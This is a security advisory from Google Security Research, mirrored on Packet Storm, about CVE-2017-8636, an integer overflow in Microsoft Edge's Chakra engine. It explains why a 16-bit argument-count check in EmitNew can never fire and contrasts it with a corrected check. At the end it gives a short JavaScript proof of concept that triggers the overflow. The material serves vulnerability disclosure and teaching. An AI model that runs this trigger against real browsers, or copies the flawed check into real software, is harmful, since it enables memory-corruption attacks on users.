Microsoft Edge Chakra EmitNew Integer Overflow

2017-08-17T00:00:00
ID PACKETSTORM:143800
Type packetstorm
Reporter Google Security Research
Modified 2017-08-17T00:00:00

Description

Microsoft Edge: Chakra: Integer overflow in EmitNew
  
CVE-2017-8636  
  
  
The bytecode generator handles "new" expressions in the "EmitNew" function.
Here is how that function checks the argument count for integer overflow:
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
    // Js::ArgSlot is 16 bits wide; the increment for "this" is done in that type.
    Js::ArgSlot argCount = pnode->sxCall.argCount;
    argCount++; // include "this"

    // Debug-only sanity check against the wider count from CountArguments.
    BOOL fSideEffectArgs = FALSE;
    unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
    Assert(argCount == tmpCount);

    // Intended overflow check: compares an ArgSlot with itself cast to ArgSlot.
    if (argCount != (Js::ArgSlot)argCount)
    {
        Js::Throw::OutOfMemory();
    }
    ...
}
  
"Js::ArgSlot" is a 16-bit unsigned integer type, and "argCount" is itself declared as "Js::ArgSlot". The increment "argCount++" therefore already wraps in 16 bits (0xFFFF + 1 becomes 0), and the comparison "argCount != (Js::ArgSlot)argCount" casts a 16-bit value to its own type, so it is always false. The check can never fire and does not prevent the overflow at all. The preceding Assert does compare against the wider "unsigned int" returned by CountArguments, but asserts are compiled out of release builds, so it offers no protection there either. For the check to mean anything, the addition has to be carried out in a type wide enough to hold the true count, and the count rejected before it is narrowed to ArgSlot.
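To make the tautology concrete, the following is an added example written for this page, not code from Chakra or from the report, that puts the quoted pattern beside a check that actually rejects the overflowing count. "ArgSlot" is assumed to be uint16_t, matching the width stated above; "vulnerable_check" and "hardened_check" are names chosen here, the narrowing of the parser's count into the 16-bit field is an assumption about the surrounding code, and the hardened variant is this example's own version rather than the shipped fix.

```cpp
#include <cstdint>
#include <cstdio>
#include <limits>

// Assumption: a 16-bit unsigned slot type standing in for Js::ArgSlot.
using ArgSlot = uint16_t;

// The pattern the advisory quotes. parsedArgCount is the number of explicit
// arguments the parser counted. The increment for "this" happens in the
// 16-bit type, and the "overflow check" compares an ArgSlot with itself cast
// to ArgSlot, which can never differ. Returns true when the check lets the
// count through and stores the slot count the caller would then use.
bool vulnerable_check(uint32_t parsedArgCount, ArgSlot* out) {
    // Assumption: the parse-node field is also narrow, so the count is
    // truncated on the way in (0x10000 becomes 0).
    ArgSlot argCount = static_cast<ArgSlot>(parsedArgCount);
    argCount++; // include "this": 0xFFFF + 1 wraps to 0 here

    if (argCount != static_cast<ArgSlot>(argCount)) { // tautology, always false
        return false; // unreachable: where Js::Throw::OutOfMemory() sits
    }
    *out = argCount;
    return true;
}

// Hardened form written for this example: keep the count in a type wide
// enough to hold the true value and reject before narrowing to ArgSlot.
bool hardened_check(uint32_t parsedArgCount, ArgSlot* out) {
    // parsedArgCount + 1 (for "this") must fit in ArgSlot, so parsedArgCount
    // itself must be strictly below ArgSlot's maximum. Testing it this way
    // also avoids wrapping the 32-bit addition for huge inputs.
    if (parsedArgCount >= std::numeric_limits<ArgSlot>::max()) {
        return false; // reject: too many arguments once "this" is counted
    }
    *out = static_cast<ArgSlot>(parsedArgCount + 1u);
    return true;
}

int main() {
    // Constructed inputs: an ordinary call, the largest count that wraps on
    // the increment, and the PoC's 0x10000 explicit arguments.
    const uint32_t inputs[] = { 0x1234u, 0xFFFFu, 0x10000u };
    for (uint32_t n : inputs) {
        ArgSlot v = 0, h = 0;
        bool vOk = vulnerable_check(n, &v);
        bool hOk = hardened_check(n, &h);
        std::printf("explicit args 0x%X: vulnerable -> %s (slots=%u), hardened -> %s\n",
                    n, vOk ? "accepted" : "rejected", static_cast<unsigned>(v),
                    hOk ? "accepted" : "rejected");
    }
    return 0;
}
```

Run as-is, the vulnerable path accepts 0xFFFF explicit arguments with a slot count of 0 and accepts the PoC's 0x10000 with a slot count of 1, while the hardened path rejects both and still accepts 0x1234 with 0x1235 slots. That mismatch between the accepted slot count and the number of arguments actually emitted is the condition the tautological check was supposed to rule out.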
  
PoC:
// Build a comma-separated list of 0x10000 arguments, one more than a 16-bit
// count can hold once "this" is added.
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
// Emit a "new" expression with that many arguments so EmitNew processes it.
eval('new Array(' + args + ')');
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
Found by: lokihardt  